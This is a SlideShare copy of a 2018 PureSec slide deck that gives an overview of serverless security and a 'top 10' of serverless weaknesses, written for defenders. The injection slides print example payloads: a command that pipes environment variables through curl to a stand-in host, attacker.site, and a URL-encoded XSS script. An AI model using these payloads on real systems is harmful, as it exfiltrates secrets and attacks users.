SlideShare a Scribd company logo
1 of 28
The Only Constant
is Change
An overview of Serverless
Security
February 2018 © 2018 PureSec
P U R E S E C
© 2017 PureSec
• I’m Ory Segal, CTO&Co-Founder @ PureSec.
• I’ve beeninvolved in application securityfor the past 20yrs.
• Responsiblefor the security researchbehind: IBM AppScan, Sanctum AppShield & AkamaiKona
Cloud Security
• Author of 20patents inthe fields ofWeb Security, SAST, DAST, IASTand automated threat
intelligence.
• WASC officer, OWASP
• Twitter:@orysegal
Agenda
• Serverless architectures overview
• Security in the age of serverless
• Top 10 most common serverless weaknesses
3
4https://www.puresec.io/puresec-state-of-serverless-security
What Is Serverless?
Serverless Architecture - Example
6
Serverless Benefits
No servers to manage
Continuous scaling
Sub-second metering
7
{ f(x) }
= Speed up time to market
Serverless Is Exploding
Cumulative Downloads of Popular Serverless Deployment Tools
Most Loved Platforms, Developers Survey 2017
The Major Providers Are Pushing It Forward
“serverless computation is going to
fundamentally not only change the
economics of what is back-end
computing, but it’s going to be the core of
the future of distributed computing.”
(Satya Nadella, 2017)
“large generations of customers will skip
instances and containers and go right to
serverless - in fact, if Amazon.com were
starting today, it would go serverless.”
(Andy Jassy, 2017)
Security in the Age of
Serverless
10
The Application Owner Has the
Responsibility of Securing the Application
Layer
FaaS Provider
Responsible
for security
“in” the cloud
Regions Availability Zones Edge Locations
Compute Storage Database Networking
Operating System + Virtual Machines + Containers
Application
Owner
Responsible
for security
“in” the cloud
Applications (Functions)
Identity & Access Management Cloud Services configuration
Client-Side Data in Cloud Data in Transit
Serverless Mandates a New Category of
Application Security
Traditional Security
Focuses on protecting
applications by securing the
network and servers
Serverless
The application owner doesn't
have any control over the
infrastructure
Traditional security solutions have become irrelevant
Serverless Functions Must Be Protected From
Within the Functions Code
Constraint:
By definition, only the function’s code is under the app owner’s
control
Paradigm Shift:
Secure the function execution itself, rather than the
infrastructure
Security must be integral to the function itself
Serverless Security - The Fly in the
Ointment
• Traditional security protections are unsuitable
• Security testing is challenging (DAST, IAST, SAST)
• Increased attack surface (surface amplification)
• Plethora of input data types (event triggers)
14
Serverless Security Top 10 Guide
Research by PureSec, together with:
https://www.puresec.io/resource-download
Serverless Security Top 10 Most Common
Weaknesses
SAS-1: Function Event Data Injection
17
The serverless-angle:
• Many types of event triggers, means
many types of input formats, and
many entry points
• Traditional protections such as WAF
are incapable of inspecting non-
HTTP event trigger data
Occurs when untrusted input is passed
directly to an interpreter and eventually
gets executed or evaluated
In a nutshell:
foobar@some.site; env | curl -H "Content-Type: text/plain" -X POST -d @-
http://attacker.site/collector
SAS-1: More Examples
18
Send messages via a RESTful API MySQLDump via Email
Curl "https://../send/sms?message=foo%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E"
SAS-2: Broken Authentication
19
The serverless-angle:
• Serverless promotes Nano-Services 
many digital properties to enforce
authentication on
• Serverless functions may expose
unnecessary entry points
• Some functions may be triggered by less
secure cloud services
• IoT device authentication can sometimes
be tricky to implement
A weak authentication implementation
might enable an attacker to bypass
application logic and manipulate its flow
In a nutshell:
Example: API gateway enforces auth., but an S3 bucket with public access,
serves as another ”rogue” entry point (triggering a Lambda)
SAS-3: Insecure Serverless Deployment
Configuration
20
The serverless-angle:
• Unauthenticated (public) cloud storage access
• Unauthenticated Web-to-Function access
• Unencrypted storage (secrets, DBs, file storage)
• Complex & tedious IAM permissions and roles
• Multiple versions of the same function
Cloud and serverless vendors in particular, offer many
customizations and configuration settings, some of which have
critical security implications.
Defaults != the most secure
In a nutshell:
SAS-4: Over Privileged Function Permissions
& Roles
21
The Least Privileged concept, helps reduce the “blast
radius” in case something goes wrong.
The serverless-angle:
• Functions should only be given permission required to
properly perform their task
• Serverless promotes nano-services architecture, which
means a complex roles & permissions model to manage
• When functions receive over-permissive rights, each
function becomes a potential attack target, and can be
leveraged for lateral movement
In a nutshell:
SAS-5: Inadequate Function Monitoring &
Logging
22
The serverless-angle:
• Serverless functions execute in the cloud, and are “ephemeral”
• Traditional “on premise” or host-based security monitoring
solutions irrelevant. Event monitoring tools & procedures are inapt
• Existing logging facilities provided by cloud vendors are not always
good enough, or disregarded by teams unfamiliar with such
capabilities
• Every cyber “intrusion kill chain” usually commences with a reconnaissance phase
• A key element in most successful major breaches was the lack of real-time incident response,
which was caused by failure to detect early signals of an attack
In a nutshell:
?
SAS-6: Insecure 3rd Party Dependencies
23
The serverless-angle:
• Serverless functions are usually compact and focused.
This means that developers must import 3rd party logic
from (potentially) untrusted sources
• Vulnerable packages
• Packages with “shady” intents
Even the most secure application will become
vulnerable when introduced with vulnerable 3rd party
dependencies
In a nutshell:
SAS-7: Insecure Application Secrets Storage
24
The serverless-angle:
• Serverless functions are oftentimes stateless. This means that
in order to persist data, developers are required to use
environment variables or insecure configuration files
• Storing secrets securely, requires using a key management
system, which not every developer is accustomed to, especially
in cloud environments
Storing sensitive data, encryption keys or other types of application
secrets, in an insecure fashion, can lead to data leakage
In a nutshell:
SAS-8: Denial of Service & Denial of
Wallet
25
The serverless-angle:
• Poor design & coding, can easily turn a simple serverless function into a DoS target – especially
when such functions expose public APIs
• Application layer DoS (e.g. ReDoS or Billion-Laughs-Attack) becomes the most prominent
weakness to worry about
• Traditional IP-based request throttling or blacklisting are irrelevant in many scenarios
• Instead of denying other users from service (DoS), attackers can attempt to cause excessive
usage, and inflict a financial penalty on the victim company (Denial of Wallet)
• During the past decade, we have seen a dramatic increase in the frequency and volume of
Denial of Service (DoS) attacks – largest attack seen was 1 Tbps!
• While serverless architectures bring a promise of automated scalability and high availability,
they do impose some limitations and issues which require attention
In a nutshell:
SAS-9: Function Execution Flow
Manipulation
26
The serverless-angle:
• In some serverless apps, each functions may use a
chain of invocation. the order of invocation might be
critical for achieving the desired logic
• Design might assume that certain functions are only
invoked under specific scenarios and only by
authorized invokers
• AWS Step Functions, Azure Logic Apps and Durable
Functions (serverless state machines)
• Manipulation of application flow may help
attackers to subvert application logic
• Attackers can eventually bypass access
controls, elevate user privileges or even
mount a Denial of Service attack
In a nutshell:
SAS-10: Verbose Error Messages &
Exceptions
27
The serverless-angle:
• Since many developers are making their first steps in
serverless, there is a tendency to:
• Use over-verbose error messages
• Enable debugging environment variables and
eventually forget to clean the code when moving it
to the production environment
• Raise your hand if you never used debug printing!
• Available options for performing line-by-line
debugging of serverless based applications is rather
limited
In a nutshell:
We Are
Hiring!
VP Product Management
Software Development Team Lead
Email us: careers@puresec.io

More Related Content

What's hot

Securing Serverless Systems
Securing Serverless SystemsSecuring Serverless Systems
Securing Serverless SystemsVincent Lau
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Alert Logic
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Alert Logic
 
#ALSummit: Amazon Web Services: Understanding the Shared Security Model
#ALSummit: Amazon Web Services: Understanding the Shared Security Model#ALSummit: Amazon Web Services: Understanding the Shared Security Model
#ALSummit: Amazon Web Services: Understanding the Shared Security ModelAlert Logic
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2: New attacks on the Internet’s Next Generation FoundationHacking HTTP/2: New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationImperva
 
Security for cloud native workloads
Security for cloud native workloadsSecurity for cloud native workloads
Security for cloud native workloadsRuncy Oommen
 
CSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSCSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSAlert Logic
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsAlert Logic
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Deivid Toledo
 
Beginner's Guide to SIEM
Beginner's Guide to SIEM Beginner's Guide to SIEM
Beginner's Guide to SIEM AlienVault
 
Putting the Sec into DevOps
Putting the Sec into DevOpsPutting the Sec into DevOps
Putting the Sec into DevOpsMaytal Levi
 
Designing A Platform Agnostic HA System
Designing A Platform Agnostic HA SystemDesigning A Platform Agnostic HA System
Designing A Platform Agnostic HA SystemRuncy Oommen
 
Gartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarGartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarImperva
 
Maturing your organization from DevOps to DevSecOps
Maturing your organization from DevOps to DevSecOpsMaturing your organization from DevOps to DevSecOps
Maturing your organization from DevOps to DevSecOpsAmazon Web Services
 
Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021lior mazor
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityAvi Shulman
 
SecDevOps 2.0 - Managing Your Robot Army
SecDevOps 2.0 - Managing Your Robot ArmySecDevOps 2.0 - Managing Your Robot Army
SecDevOps 2.0 - Managing Your Robot Armyconjur_inc
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewallsEnclaveSecurity
 

What's hot (20)

Securing Serverless Systems
Securing Serverless SystemsSecuring Serverless Systems
Securing Serverless Systems
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
#ALSummit: Amazon Web Services: Understanding the Shared Security Model
#ALSummit: Amazon Web Services: Understanding the Shared Security Model#ALSummit: Amazon Web Services: Understanding the Shared Security Model
#ALSummit: Amazon Web Services: Understanding the Shared Security Model
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2: New attacks on the Internet’s Next Generation FoundationHacking HTTP/2: New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
 
Security for cloud native workloads
Security for cloud native workloadsSecurity for cloud native workloads
Security for cloud native workloads
 
CSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSCSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWS
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web Applications
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)
 
Beginner's Guide to SIEM
Beginner's Guide to SIEM Beginner's Guide to SIEM
Beginner's Guide to SIEM
 
Putting the Sec into DevOps
Putting the Sec into DevOpsPutting the Sec into DevOps
Putting the Sec into DevOps
 
Designing A Platform Agnostic HA System
Designing A Platform Agnostic HA SystemDesigning A Platform Agnostic HA System
Designing A Platform Agnostic HA System
 
F5 Web Application Security
F5 Web Application SecurityF5 Web Application Security
F5 Web Application Security
 
Gartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarGartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall Webinar
 
Maturing your organization from DevOps to DevSecOps
Maturing your organization from DevOps to DevSecOpsMaturing your organization from DevOps to DevSecOps
Maturing your organization from DevOps to DevSecOps
 
Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless Security
 
SecDevOps 2.0 - Managing Your Robot Army
SecDevOps 2.0 - Managing Your Robot ArmySecDevOps 2.0 - Managing Your Robot Army
SecDevOps 2.0 - Managing Your Robot Army
 
Application Security Logging with Splunk using Java
Application Security Logging with Splunk using JavaApplication Security Logging with Splunk using Java
Application Security Logging with Splunk using Java
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
 

Similar to Serverless Security Top 10

Security and Compliance for Enterprise Cloud Infrastructure
Security and Compliance for Enterprise Cloud InfrastructureSecurity and Compliance for Enterprise Cloud Infrastructure
Security and Compliance for Enterprise Cloud InfrastructureCloudPassage
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Akash Mahajan
 
SSL VPN Evaluation Guide
SSL VPN Evaluation GuideSSL VPN Evaluation Guide
SSL VPN Evaluation Guide Array Networks
 
Serverless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesServerless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesUnderscore VC
 
The Rise of Serverless Architecture in Web Development.docx
The Rise of Serverless Architecture in Web Development.docxThe Rise of Serverless Architecture in Web Development.docx
The Rise of Serverless Architecture in Web Development.docxSavior_Marketing
 
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS   IT 6873 presentationOwasp A9 USING KNOWN VULNERABLE COMPONENTS   IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentationDerrick Hunter
 
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...apidays
 
What serverless means for enterprise apps
What serverless means for enterprise appsWhat serverless means for enterprise apps
What serverless means for enterprise appsSumit Sarkar
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
Serverless security - how to protect what you don't see?
Serverless security - how to protect what you don't see?Serverless security - how to protect what you don't see?
Serverless security - how to protect what you don't see?Sqreen
 
Using Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security ProblemsUsing Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security Problemskiansahafi
 
Orchestrated - multi tenant architecture at scale with serverless
Orchestrated - multi tenant architecture at scale with serverlessOrchestrated - multi tenant architecture at scale with serverless
Orchestrated - multi tenant architecture at scale with serverlessmartinfoster
 
Cloudera federal summit
Cloudera federal summitCloudera federal summit
Cloudera federal summitMatt Carroll
 
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)Jeremy Daly
 
Application hardening, Secure Socket Layer(SSL) & Secure Electronic Transacti...
Application hardening, Secure Socket Layer(SSL) & Secure Electronic Transacti...Application hardening, Secure Socket Layer(SSL) & Secure Electronic Transacti...
Application hardening, Secure Socket Layer(SSL) & Secure Electronic Transacti...Jayesh Naik
 
Application hardening
Application hardeningApplication hardening
Application hardeningJayesh Naik
 
Security that works with, not against, your SaaS business
Security that works with, not against, your SaaS businessSecurity that works with, not against, your SaaS business
Security that works with, not against, your SaaS businessCloudPassage
 
CSC AWS re:Invent Enterprise DevOps session
CSC AWS re:Invent Enterprise DevOps sessionCSC AWS re:Invent Enterprise DevOps session
CSC AWS re:Invent Enterprise DevOps sessionTom Laszewski
 

Similar to Serverless Security Top 10 (20)

Security and Compliance for Enterprise Cloud Infrastructure
Security and Compliance for Enterprise Cloud InfrastructureSecurity and Compliance for Enterprise Cloud Infrastructure
Security and Compliance for Enterprise Cloud Infrastructure
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014
 
SSL VPN Evaluation Guide
SSL VPN Evaluation GuideSSL VPN Evaluation Guide
SSL VPN Evaluation Guide
 
Serverless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesServerless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment Opportunities
 
Going Serverless on AWS
Going Serverless on AWSGoing Serverless on AWS
Going Serverless on AWS
 
The Rise of Serverless Architecture in Web Development.docx
The Rise of Serverless Architecture in Web Development.docxThe Rise of Serverless Architecture in Web Development.docx
The Rise of Serverless Architecture in Web Development.docx
 
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS   IT 6873 presentationOwasp A9 USING KNOWN VULNERABLE COMPONENTS   IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
 
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
 
What serverless means for enterprise apps
What serverless means for enterprise appsWhat serverless means for enterprise apps
What serverless means for enterprise apps
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Serverless security - how to protect what you don't see?
Serverless security - how to protect what you don't see?Serverless security - how to protect what you don't see?
Serverless security - how to protect what you don't see?
 
Using Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security ProblemsUsing Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security Problems
 
Orchestrated - multi tenant architecture at scale with serverless
Orchestrated - multi tenant architecture at scale with serverlessOrchestrated - multi tenant architecture at scale with serverless
Orchestrated - multi tenant architecture at scale with serverless
 
Cloudera federal summit
Cloudera federal summitCloudera federal summit
Cloudera federal summit
 
Cloud application security (CCSP Domain 4)
Cloud application security (CCSP Domain 4)Cloud application security (CCSP Domain 4)
Cloud application security (CCSP Domain 4)
 
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
 
Application hardening, Secure Socket Layer(SSL) & Secure Electronic Transacti...
Application hardening, Secure Socket Layer(SSL) & Secure Electronic Transacti...Application hardening, Secure Socket Layer(SSL) & Secure Electronic Transacti...
Application hardening, Secure Socket Layer(SSL) & Secure Electronic Transacti...
 
Application hardening
Application hardeningApplication hardening
Application hardening
 
Security that works with, not against, your SaaS business
Security that works with, not against, your SaaS businessSecurity that works with, not against, your SaaS business
Security that works with, not against, your SaaS business
 
CSC AWS re:Invent Enterprise DevOps session
CSC AWS re:Invent Enterprise DevOps sessionCSC AWS re:Invent Enterprise DevOps session
CSC AWS re:Invent Enterprise DevOps session
 

Recently uploaded

Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 

Recently uploaded (20)

Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 

Serverless Security Top 10

  • 1. The Only Constant is Change An overview of Serverless Security February 2018 © 2018 PureSec
  • 2. P U R E S E C © 2017 PureSec • I’m Ory Segal, CTO&Co-Founder @ PureSec. • I’ve beeninvolved in application securityfor the past 20yrs. • Responsiblefor the security researchbehind: IBM AppScan, Sanctum AppShield & AkamaiKona Cloud Security • Author of 20patents inthe fields ofWeb Security, SAST, DAST, IASTand automated threat intelligence. • WASC officer, OWASP • Twitter:@orysegal
  • 3. Agenda • Serverless architectures overview • Security in the age of serverless • Top 10 most common serverless weaknesses 3
  • 7. Serverless Benefits No servers to manage Continuous scaling Sub-second metering 7 { f(x) } = Speed up time to market
  • 8. Serverless Is Exploding Cumulative Downloads of Popular Serverless Deployment Tools Most Loved Platforms, Developers Survey 2017
  • 9. The Major Providers Are Pushing It Forward “serverless computation is going to fundamentally not only change the economics of what is back-end computing, but it’s going to be the core of the future of distributed computing.” (Satya Nadella, 2017) “large generations of customers will skip instances and containers and go right to serverless - in fact, if Amazon.com were starting today, it would go serverless.” (Andy Jassy, 2017)
  • 10. Security in the Age of Serverless 10
  • 11. The Application Owner Has the Responsibility of Securing the Application Layer FaaS Provider Responsible for security “in” the cloud Regions Availability Zones Edge Locations Compute Storage Database Networking Operating System + Virtual Machines + Containers Application Owner Responsible for security “in” the cloud Applications (Functions) Identity & Access Management Cloud Services configuration Client-Side Data in Cloud Data in Transit
  • 12. Serverless Mandates a New Category of Application Security Traditional Security Focuses on protecting applications by securing the network and servers Serverless The application owner doesn't have any control over the infrastructure Traditional security solutions have become irrelevant
  • 13. Serverless Functions Must Be Protected From Within the Functions Code Constraint: By definition, only the function’s code is under the app owner’s control Paradigm Shift: Secure the function execution itself, rather than the infrastructure Security must be integral to the function itself
  • 14. Serverless Security - The Fly in the Ointment • Traditional security protections are unsuitable • Security testing is challenging (DAST, IAST, SAST) • Increased attack surface (surface amplification) • Plethora of input data types (event triggers) 14
